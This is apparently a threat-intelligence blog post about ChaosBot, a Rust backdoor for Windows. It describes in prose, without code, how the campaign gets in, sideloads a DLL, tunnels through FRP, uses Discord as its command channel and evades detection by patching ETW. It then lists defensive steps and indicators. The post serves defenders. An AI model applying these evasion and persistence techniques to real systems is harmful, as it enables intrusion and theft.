The ChaosBot opens the Rusty Backdoor

A robot sneaks through a squeaky, rusty backdoor — and this time, it’s not a metaphor. A new Rust-based backdoor dubbed ChaosBot is giving operators full remote control of compromised Windows systems. Once inside, it can execute arbitrary commands, exfiltrate files, and sustain internal access by hiding its control channel within Discord servers. Detected first in late September 2025, the malware blends sophisticated privilege abuse, credential theft, and stealthy persistence in one metallic package.

Phase 1: Entry and Initial Compromise 

The attackers’ entry vector combined stolen Cisco VPN credentials and over-privileged Active Directory (AD) accounts, granting them high-level internal access from the start. In parallel, phishing campaigns distributed malicious LNK shortcuts, which when opened executed PowerShell commands to fetch and run the ChaosBot payload. These dual methods ensured flexibility: social engineering for wide reach, and credential-based infiltration for targeted internal breaches.

Once deployed, the malware began spreading laterally across corporate networks, exploiting weak credential policies and misconfigured remote execution rights. This dual entry strategy shows the attackers’ operational maturity — combining identity compromise with endpoint infection to maximize persistence and impact.

Phase 2: Implant and Execution 

ChaosBot’s loader uses a DLL-sideloading technique, abusing Microsoft Edge’s legitimate binary identity_helper.exe to load a malicious library named msedge_elf.dll. This does not exploit a browser flaw, but rather leverages a trusted executable to camouflage the attack.

Once active, ChaosBot installs an FRP (Fast Reverse Proxy), establishing a covert tunnel that allows continuous access into the victim’s network without triggering common outbound alerts. The bot then registers with specific Discord accounts—notably chaos_00019 and lovebb0024—that act as its command-and-control (C2) operators. Through Discord channels, attackers can issue commands like shell, scr, download, and upload, enabling them to:

• Execute PowerShell or shell commands remotely.

• Capture screenshots for reconnaissance.

• Move and exfiltrate files.

• Deploy additional payloads or tools for deeper exploitation.

The use of Discord as C2 is strategic: it blends malicious traffic into legitimate encrypted HTTPS flows, making detection far more difficult for defenders relying on conventional anomaly-based systems.

Phase 3: Evasion and Persistence 

ChaosBot incorporates advanced evasion routines. It patches Event Tracing for Windows (ETW) by altering the EtwEventWrite function, effectively blinding defenders’ telemetry. In addition, it performs virtual machine checks, comparing MAC address prefixes to detect sandbox environments like VMware or VirtualBox — a tactic that prevents security researchers from analyzing its behavior in controlled conditions.

These capabilities make ChaosBot resilient and difficult to eradicate once deployed. Its Rust-based architecture adds another layer of stealth, since Rust binaries are harder to reverse-engineer and often slip past signature-based antivirus systems. Combined with its use of common binaries and legitimate channels, ChaosBot represents a new evolution of modular, cloud-integrated backdoors.

Measures to Fend Off the Bot 

Organizations should assume exposure and act decisively:

• Revoke and rotate all compromised or over-privileged VPN and AD credentials.

• Block LNK→PowerShell execution chains at mail and network gateways.

• Hunt for indicators such as msedge_elf.dll, identity_helper.exe, FRP tunnels, and Discord C2 traffic patterns.

• Disable DLL sideloading paths where possible to reduce binary abuse.

• Harden endpoints by enforcing least privilege and credential segmentation.

• Enable behavioral EDR detections for lateral movement, proxy tunnels, and anomalous PowerShell execution.

• Monitor Discord traffic within corporate environments and restrict external communication where unnecessary.

The arrival of ChaosBot underscores the rising sophistication of Rust-based malware and the blending of corporate credential abuse with cloud-native communication platforms. By abusing legitimate binaries and collaboration tools, attackers effectively turn trusted digital infrastructure into covert command channels. The campaign reminds defenders that the modern enterprise perimeter isn’t just at the firewall — it’s everywhere trust resides, from user credentials to chat apps.

The Hacker News

https://thehackernews.com/2025/10/new-rust-based-malware-chaosbot-hijacks.html?m=1